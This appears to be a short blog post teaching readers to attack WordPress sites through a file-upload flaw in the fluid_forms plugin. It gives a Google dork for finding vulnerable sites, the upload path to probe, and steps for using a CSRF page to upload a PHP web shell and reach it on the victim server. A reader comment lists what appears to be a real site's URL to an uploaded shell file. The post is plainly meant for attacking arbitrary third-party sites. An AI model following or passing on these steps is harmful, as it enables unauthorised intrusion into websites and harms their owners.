Hello Fans,
our today's article will be on WordPress Fluid_forms Upload Vulnerability
Exploit..
#Type: CSRF & Xampp, Uploadify
#Tested: Windows XP, 7, 8, BackBox
#CMS: WordPress
NOW LET MOVE ON
Dork: inurl:fluid_forms or inurl:"/wp-content/plugins/fluid_forms/file-upload/"
Exploit: /wp-content/plugins/fluid_forms/ file upload/server/php/
search the dork in Google, Select a target, then enter Exploit.
example:
site.com/wp-content/plugins/fluid_forms /fileupload/server/php/
If Vuln, it will display "files []"
CSRF
Replace www.site.com with your
target web, then Save the csrf script as: .html E.G md.html and upload your shell.
Shell Access: /wp-content/plugins/
fluid_forms/file-upload/server/php/
files/shellname.php
thats all, if you dont understand contact me or comment bellow...
http://www.rogeliogarciaabogado.com/wp-content/plugins/fluid_forms/file-upload/server/php/files/b7k.php
ReplyDeletenot working